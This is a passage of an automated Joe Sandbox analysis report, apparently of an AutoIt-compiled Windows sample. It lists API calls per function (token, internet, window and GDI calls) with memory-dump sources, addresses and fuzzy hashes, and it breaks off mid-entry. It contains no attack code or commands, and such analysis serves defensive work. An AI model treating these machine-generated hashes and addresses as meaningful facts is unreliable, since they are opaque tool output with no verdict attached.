                                    • AttachThreadInput.USER32(00000000), ref: 009BC86B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                    • String ID:
                                    • API String ID: 2710830443-0
                                    • Opcode ID: 5319bfff1cd87094e9fee087ceb6bc1a682c4df15c146b1700d9d3aff3af5427
                                    • Instruction ID: fa39a212f6e343e6303ca2b49bb08acb959305949c7853e68f49bb64065d0cee
                                    • Opcode Fuzzy Hash: 5319bfff1cd87094e9fee087ceb6bc1a682c4df15c146b1700d9d3aff3af5427
                                    • Instruction Fuzzy Hash: 1BE0657254122876DB109FE1DC0DEDB7F2CEF057B1F008011B50D85450D672C582C7E0
                                    APIs
                                    • GetCurrentThread.KERNEL32 ref: 009BB0D6
                                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,009BAC9D), ref: 009BB0DD
                                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,009BAC9D), ref: 009BB0EA
                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,009BAC9D), ref: 009BB0F1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: CurrentOpenProcessThreadToken
                                    • String ID:
                                    • API String ID: 3974789173-0
                                    • Opcode ID: 8fe105730060df5d54bcc8cd6ca8b71762dfd99319132c6f0ca271989b0964f3
                                    • Instruction ID: a125e9d0d34c32da15f956ccb57fe7558b238093a233768674635b13d431ba57
                                    • Opcode Fuzzy Hash: 8fe105730060df5d54bcc8cd6ca8b71762dfd99319132c6f0ca271989b0964f3
                                    • Instruction Fuzzy Hash: 0DE086736012159BD720AFF15D0CB973BACEF557A1F018818F346DA080DB748403C761
                                    APIs
                                    • GetSysColor.USER32(00000008), ref: 0099B496
                                    • SetTextColor.GDI32(?,000000FF), ref: 0099B4A0
                                    • SetBkMode.GDI32(?,00000001), ref: 0099B4B5
                                    • GetStockObject.GDI32(00000005), ref: 0099B4BD
                                    • GetWindowDC.USER32(?,00000000), ref: 009FDE2B
                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 009FDE38
                                    • GetPixel.GDI32(00000000,?,00000000), ref: 009FDE51
                                    • GetPixel.GDI32(00000000,00000000,?), ref: 009FDE6A
                                    • GetPixel.GDI32(00000000,?,?), ref: 009FDE8A
                                    • ReleaseDC.USER32(?,00000000), ref: 009FDE95
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                    • String ID:
                                    • API String ID: 1946975507-0
                                    • Opcode ID: 6535d31997d93bf65d93f2080bdb60eacfbdda8451ba83be4beebfcc68cf40e5
                                    • Instruction ID: a5beab6d52c2f7814ba63ba8e3090bd7f4542ae0ba328f32f8013e41a893c929
                                    • Opcode Fuzzy Hash: 6535d31997d93bf65d93f2080bdb60eacfbdda8451ba83be4beebfcc68cf40e5
                                    • Instruction Fuzzy Hash: B0E0ED32100248AAEF219BE8AC0DBE83F15AB55339F14C766FB6A580E1C7714592DB11
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: CapsDesktopDeviceReleaseWindow
                                    • String ID:
                                    • API String ID: 2889604237-0
                                    • Opcode ID: 0d4fec64197882f63e21ff0636da70b1091052c8a15c0612a4ac14fb83b31080
                                    • Instruction ID: 0915a9110fad445a70ac9a25312ce5ffd8c4a5b75112acdfbd9809726df00e8e
                                    • Opcode Fuzzy Hash: 0d4fec64197882f63e21ff0636da70b1091052c8a15c0612a4ac14fb83b31080
                                    • Instruction Fuzzy Hash: 3DE04FB2100208EFDB009FF0C84866E7BA4EB4C351F11C809FD5A87210DB7998438B40
                                    APIs
                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 009BB2DF
                                    • 74745030.USERENV(?,?), ref: 009BB2EB
                                    • CloseHandle.KERNEL32(?), ref: 009BB2F4
                                    • CloseHandle.KERNEL32(?), ref: 009BB2FC
                                      • Part of subcall function 009BAB24: GetProcessHeap.KERNEL32(00000000,?,009BA848), ref: 009BAB2B
                                      • Part of subcall function 009BAB24: HeapFree.KERNEL32(00000000), ref: 009BAB32
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: CloseHandleHeap$74745030FreeObjectProcessSingleWait
                                    • String ID:
                                    • API String ID: 443658836-0
                                    • Opcode ID: 5b1f514c75f931fa988e86b78d80fc0a233c70b404b1388c44eef80eb814f4c3
                                    • Instruction ID: 4bee7750e9294dc8818bba5659998a05c8aa5d9ee9b224b1d86e4d4421de7552
                                    • Opcode Fuzzy Hash: 5b1f514c75f931fa988e86b78d80fc0a233c70b404b1388c44eef80eb814f4c3
                                    • Instruction Fuzzy Hash: C5E0BF37104009BBCB016BD5EC08859FF66FF883213109221F62581571CB329473EB52
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: CapsDesktopDeviceReleaseWindow
                                    • String ID:
                                    • API String ID: 2889604237-0
                                    • Opcode ID: f4d0b3bcd372e7bc06134cf14348668a6795025a4b0a7c4cdc8706a51ef09f1f
                                    • Instruction ID: f3d48b6fc02f2c0dec7c88d101fa13bd71434b65aaedaf02c62e7a5c6a801127
                                    • Opcode Fuzzy Hash: f4d0b3bcd372e7bc06134cf14348668a6795025a4b0a7c4cdc8706a51ef09f1f
                                    • Instruction Fuzzy Hash: 89E046B2500208EFDF009FF0C84862DBBA8EB4C351F118809F95E8B210DB7A98438B00
                                    APIs
                                    • OleSetContainedObject.OLE32(?,00000001), ref: 009BDEAA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: ContainedObject
                                    • String ID: AutoIt3GUI$Container
                                    • API String ID: 3565006973-3941886329
                                    • Opcode ID: b692fab3c2879ada86d040e5c3dcd7a93653d0a13740646cde0053ac82747b38
                                    • Instruction ID: 471ae615761f8dfff54ba510d19b29f99eb187dfb83bc6dc6d7a6abd35d8f5d7
                                    • Opcode Fuzzy Hash: b692fab3c2879ada86d040e5c3dcd7a93653d0a13740646cde0053ac82747b38
                                    • Instruction Fuzzy Hash: EF914A70601701AFDB14CF64C984BAAB7F9BF88720F10896DF94ACB691EB70E841CB50
                                    APIs
                                    • Sleep.KERNEL32(00000000), ref: 0099BCDA
                                    • GlobalMemoryStatusEx.KERNEL32 ref: 0099BCF3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: GlobalMemorySleepStatus
                                    • String ID: @
                                    • API String ID: 2783356886-2766056989
                                    • Opcode ID: f92b4ae3a1fc7f34481add744472d8b418eabaa6bbbc07e40fe1bc2137b10652
                                    • Instruction ID: cdf67357d8fa45c69f8248268824e24c0dc8fecfbe837ead62c5c0ca5a991cf2
                                    • Opcode Fuzzy Hash: f92b4ae3a1fc7f34481add744472d8b418eabaa6bbbc07e40fe1bc2137b10652
                                    • Instruction Fuzzy Hash: 67512571409748ABE720AF58DC86BAFBBE8FFD4354F41484EF1C8410A6EB7085A9C756
                                    APIs
                                      • Part of subcall function 009844ED: __fread_nolock.LIBCMT ref: 0098450B
                                    • _wcscmp.LIBCMT ref: 009CC65D
                                    • _wcscmp.LIBCMT ref: 009CC670
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: _wcscmp$__fread_nolock
                                    • String ID: FILE
                                    • API String ID: 4029003684-3121273764
                                    • Opcode ID: 4ad0804f88de715d907ab2a44e1871eafa7f8889f6586242b64429e00ebc1812
                                    • Instruction ID: ef38fea2c0c6813c57bbfa87c0b22a6a59ebba2e49a03420445f86801f2ab5c0
                                    • Opcode Fuzzy Hash: 4ad0804f88de715d907ab2a44e1871eafa7f8889f6586242b64429e00ebc1812
                                    • Instruction Fuzzy Hash: D5419672A0021ABBDF10AAA4DC42FEF7BB9AF89714F004479F605E7191D6759A048B51
                                    APIs
                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 009EA85A
                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 009EA86F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID: '
                                    • API String ID: 3850602802-1997036262
                                    • Opcode ID: ded10e94dcd257fcb6ceb8613007ec0ad6f595f6ffe0724366a0dd8e0b36ab2a
                                    • Instruction ID: bc98c4883f003762d28e6be83bc15eba62c8c7c2933411bbaae0d85737d71b38
                                    • Opcode Fuzzy Hash: ded10e94dcd257fcb6ceb8613007ec0ad6f595f6ffe0724366a0dd8e0b36ab2a
                                    • Instruction Fuzzy Hash: 0B410A75E013499FDB15CFA9C880BDABBB9FB49300F11006AE905AB351D775AD42CFA1
                                    APIs
                                    • _memset.LIBCMT ref: 009D5190
                                    • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 009D51C6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: CrackInternet_memset
                                    • String ID: |
                                    • API String ID: 1413715105-2343686810
                                    • Opcode ID: 26b24f2bc8f7b806cf3fa69ca18a3ad763b437f7fde5218e6232ea58765b26f9
                                    • Instruction ID: 56c262b60fc5641bb00b26b0961ccc8b275a6e9c97c4dbd96569538433fdc9b7
                                    • Opcode Fuzzy Hash: 26b24f2bc8f7b806cf3fa69ca18a3ad763b437f7fde5218e6232ea58765b26f9
                                    • Instruction Fuzzy Hash: 82313C71C00119ABCF01EFE4CC85AEE7FB9FF54750F10401AF915A6266DB31AA06DBA0
                                    APIs
                                    • DestroyWindow.USER32(?,?,?,?), ref: 009E980E
                                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 009E984A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Window$DestroyMove
                                    • String ID: static
                                    • API String ID: 2139405536-2160076837
                                    • Opcode ID: c3c5f86a757200d4d4b81def1e4983b4e948a3ee263690d3f35a153bba3836fd
                                    • Instruction ID: 48799173540fbe933459269add76b207c04179eeb262195f0bcfa74cde7d934d
                                    • Opcode Fuzzy Hash: c3c5f86a757200d4d4b81def1e4983b4e948a3ee263690d3f35a153bba3836fd
                                    • Instruction Fuzzy Hash: 17317C71110644AAEB119F79CC80BBB73ADFF99764F008619F9A9C71A0DA31AC82C760
                                    APIs
                                    • _memset.LIBCMT ref: 009C51C6
                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 009C5201
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: InfoItemMenu_memset
                                    • String ID: 0
                                    • API String ID: 2223754486-4108050209
                                    • Opcode ID: 3ef0cfd0e93fdca41a1401ef0dfdc92bc62b9d3d6f4c51fefd21cf5b23c5bccf
                                    • Instruction ID: 1fa709b9c4029c1341cc3ebac93cc366de5972a730c1d395d309eb88bdd44625
                                    • Opcode Fuzzy Hash: 3ef0cfd0e93fdca41a1401ef0dfdc92bc62b9d3d6f4c51fefd21cf5b23c5bccf
                                    • Instruction Fuzzy Hash: F431D571E007049BEB24CF99D845FAEBBFCAF85350F15401DE9A1A61A0D770A984DB12
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: __snwprintf
                                    • String ID: , $$AUTOITCALLVARIABLE%d
                                    • API String ID: 2391506597-2584243854
                                    • Opcode ID: b9af70c0a35ef723213c0feb55d16ee02fec04ee5742909807e9155c3c0759ad
                                    • Instruction ID: 59058fe38fafe55d6469d001a849faad6f4bd13236cd63fc520fb937d4899006
                                    • Opcode Fuzzy Hash: b9af70c0a35ef723213c0feb55d16ee02fec04ee5742909807e9155c3c0759ad
                                    • Instruction Fuzzy Hash: 0E217171644219AFCF10EFA4C882FEE77B4BF95744F40485AF505AB281DB70EA45CBA1
                                    APIs
                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 009E945C
                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 009E9467
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID: Combobox
                                    • API String ID: 3850602802-2096851135
                                    • Opcode ID: 078b82ecb9af92e3fd920d9d8a434b39ef3f1f8b9e15978c0384c520e403d0a0
                                    • Instruction ID: 0109a1078c69616cef20d6eaa2950dd8ca08287b3c2dce3b115fd424633dc32d
                                    • Opcode Fuzzy Hash: 078b82ecb9af92e3fd920d9d8a434b39ef3f1f8b9e15978c0384c520e403d0a0
                                    • Instruction Fuzzy Hash: BB116071210258AFEF26DE55DC80EBB376FEB893A4F104125F919972E0E6719C528760
                                    APIs
                                      • Part of subcall function 0099D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0099D1BA
                                      • Part of subcall function 0099D17C: GetStockObject.GDI32(00000011), ref: 0099D1CE
                                      • Part of subcall function 0099D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0099D1D8
                                    • GetWindowRect.USER32(00000000,?), ref: 009E9968
                                    • GetSysColor.USER32(00000012), ref: 009E9982
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                    • String ID: static
                                    • API String ID: 1983116058-2160076837
                                    • Opcode ID: f7318725d3bf3ab9085141b182ea2e3b6f5e4dafea4a712dccf17551f485c091
                                    • Instruction ID: d121deab6dcc21004289d65d8789bec0d943943dfd995a7dc69ef0bb8273b543
                                    • Opcode Fuzzy Hash: f7318725d3bf3ab9085141b182ea2e3b6f5e4dafea4a712dccf17551f485c091
                                    • Instruction Fuzzy Hash: DA116772520209AFDB05DFF8CC45AEA7BA8FB48304F014A28F955E3251E735E851DB60
                                    APIs
                                    • GetWindowTextLengthW.USER32(00000000), ref: 009E9699
                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 009E96A8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: LengthMessageSendTextWindow
                                    • String ID: edit
                                    • API String ID: 2978978980-2167791130
                                    • Opcode ID: b2bfdcfec53f2117261b9b6b690dac309505e745e11eac6d34783733608466bb
                                    • Instruction ID: 7143405c36960dac7e75f65741b7540be306925499daf0a984018ea2f529b488
                                    • Opcode Fuzzy Hash: b2bfdcfec53f2117261b9b6b690dac309505e745e11eac6d34783733608466bb
                                    • Instruction Fuzzy Hash: 0F11BC72100188ABEF128FA9DC80EEB3B6EEB457B8F100716F925971E0C736DC919760
                                    APIs
                                    • _memset.LIBCMT ref: 009C52D5
                                    • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 009C52F4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: InfoItemMenu_memset
                                    • String ID: 0
                                    • API String ID: 2223754486-4108050209
                                    • Opcode ID: 9b2a877ae7e3177224ffb3406289324aba5e5d53ecc932cec026d8697432f308
                                    • Instruction ID: 12717a721e6cdf932634e1a965f8ac30d00582a20a8fb6fb473baee0d5f9db3e
                                    • Opcode Fuzzy Hash: 9b2a877ae7e3177224ffb3406289324aba5e5d53ecc932cec026d8697432f308
                                    • Instruction Fuzzy Hash: D2110336E00614EBDB10DA98C840F9D77ECAB86350F060019E812E7190D3B0BD81CB92
                                    APIs
                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 009D4DF5
                                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 009D4E1E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Internet$OpenOption
                                    • String ID: <local>
                                    • API String ID: 942729171-4266983199
                                    • Opcode ID: 4dc0ee3b2f37021aaf56360915836baef455079c9c9f5a92ffbb544cd12996df
